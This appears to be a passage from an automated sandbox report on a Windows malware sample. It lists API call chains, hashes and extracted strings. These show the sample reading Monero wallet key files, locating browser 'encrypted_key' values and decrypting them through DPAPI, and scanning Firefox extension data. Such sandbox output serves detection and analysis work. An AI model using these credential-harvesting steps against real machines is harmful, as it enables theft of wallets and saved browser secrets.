                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BCD801
                    • lstrlen.KERNEL32(00000000), ref: 00BCD99F
                    • lstrlen.KERNEL32(00000000), ref: 00BCD9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 00BCDA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 6d7245e2d0ae766a260120bcee2fb986810055e8c514eb2e43b7363cde446425
                    • Instruction ID: 0a23272325be08baf0aa5fce3b2718e4e937b6f169a94447d2fd2c720b54100a
                    • Opcode Fuzzy Hash: 6d7245e2d0ae766a260120bcee2fb986810055e8c514eb2e43b7363cde446425
                    • Instruction Fuzzy Hash: 388123718101089BCB04FBA4DC92EEEB3B8AF14300F5445AAF407B6291FF756A49DB66
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00BE1580,00BE0D92), ref: 00BCF54C
                    • lstrlen.KERNEL32(00000000), ref: 00BCF56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: 686669225d65302c408673b3b511891c8e8408fecefe70cef08faf7b59a3b373
                    • Instruction ID: 9ec37498d6e0e1805cfe3e1fb9d806ba2ff3bcb0b0212d34753fd0d552149279
                    • Opcode Fuzzy Hash: 686669225d65302c408673b3b511891c8e8408fecefe70cef08faf7b59a3b373
                    • Instruction Fuzzy Hash: E9513471D101489ADB04FBB4DC96DEDB3B8AF54300F4085B9F81667291FF346A09CBA6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: b69db36d0128499f6b4dd635a33c4d93a58f8d0dc4d610525d0c04846d6e2dc7
                    • Instruction ID: 9dba55bf2846615eb50b96a295e726dfe78f04cdaf35687e7213ed1dfd8b52df
                    • Opcode Fuzzy Hash: b69db36d0128499f6b4dd635a33c4d93a58f8d0dc4d610525d0c04846d6e2dc7
                    • Instruction Fuzzy Hash: 88416F71D10209AFCB04EFA5D885AEEF7F4EB04704F048069E41676391EB75AA45CFA2
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BC9D39
                      • Part of subcall function 00BC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9AEF
                      • Part of subcall function 00BC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B01
                      • Part of subcall function 00BC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9B2A
                      • Part of subcall function 00BC9AC0: LocalFree.KERNEL32(?,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B3F
                      • Part of subcall function 00BC9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BC9B84
                      • Part of subcall function 00BC9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BC9BA3
                      • Part of subcall function 00BC9B60: LocalFree.KERNEL32(?), ref: 00BC9BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: d3675514be1eb93f77164dc3df9bc6d5c4aad49a536d0e50a8607aff3c66ca5a
                    • Instruction ID: 2a8caba24e0dbddf643a755cd54908c4deb6c8c32d45fcfbf5291343ddf37cd3
                    • Opcode Fuzzy Hash: d3675514be1eb93f77164dc3df9bc6d5c4aad49a536d0e50a8607aff3c66ca5a
                    • Instruction Fuzzy Hash: 2B311EB5D10209ABDB04DBE4DC89FEEB7F8EB48304F1445ADE906B7241E7359A04CBA1
                    APIs
                    • CreateFileA.KERNEL32(00BD3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00BD3AEE,?), ref: 00BD92FC
                    • GetFileSizeEx.KERNEL32(000000FF,00BD3AEE), ref: 00BD9319
                    • CloseHandle.KERNEL32(000000FF), ref: 00BD9327
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID:
                    • API String ID: 1378416451-0
                    • Opcode ID: d5033f974a49a560ca7d1d61b0090e57761dc25f294a009a1a8c44afbb3915c5
                    • Instruction ID: 2dc6360ad4a40e650ff956b12da30b81c4e520c8fef49987158b51b9a29e4760
                    • Opcode Fuzzy Hash: d5033f974a49a560ca7d1d61b0090e57761dc25f294a009a1a8c44afbb3915c5
                    • Instruction Fuzzy Hash: 36F08C34E00308BBDB14DBB1DC48B9EB7F9EB48320F14C2A5B611A72C0E6B196408B45
                    APIs
                    • __getptd.LIBCMT ref: 00BDC74E
                      • Part of subcall function 00BDBF9F: __amsg_exit.LIBCMT ref: 00BDBFAF
                    • __getptd.LIBCMT ref: 00BDC765
                    • __amsg_exit.LIBCMT ref: 00BDC773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00BDC797
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: 9887d07de8dbd9e90ddb49f24371886aa2c4ede70d8cc5d4f0f7793046b54883
                    • Instruction ID: e41bca126a2859bbe08a0edadf2902de08a4a10d3f4152727365839a01267ab2
                    • Opcode Fuzzy Hash: 9887d07de8dbd9e90ddb49f24371886aa2c4ede70d8cc5d4f0f7793046b54883
                    • Instruction Fuzzy Hash: 7BF049329056029ADB21BBA89846B4EBBE0AF00721F2141CBF404AB3D2FF645D41DE5A
                    APIs
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4F7A
                    • lstrcat.KERNEL32(?,00BE1070), ref: 00BD4F97
                    • lstrcat.KERNEL32(?,013C9168), ref: 00BD4FAB
                    • lstrcat.KERNEL32(?,00BE1074), ref: 00BD4FBD
                      • Part of subcall function 00BD4910: wsprintfA.USER32 ref: 00BD492C
                      • Part of subcall function 00BD4910: FindFirstFileA.KERNEL32(?,?), ref: 00BD4943
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE0FDC), ref: 00BD4971
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE0FE0), ref: 00BD4987
                      • Part of subcall function 00BD4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BD4B7D
                      • Part of subcall function 00BD4910: FindClose.KERNEL32(000000FF), ref: 00BD4B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: a2966d744dcb0189c12990297c7f3dacd0e317797cb1b87777722c3974608383
                    • Instruction ID: 14946d8b178c7b80cd18e59027f3be2b3714446415f9c818cf64658eabd0937b
                    • Opcode Fuzzy Hash: a2966d744dcb0189c12990297c7f3dacd0e317797cb1b87777722c3974608383
                    • Instruction Fuzzy Hash: 5621C87690030C6BC754FB71DC46EED73BCAB54300F0045E9B699A2192EE759ACD8BA2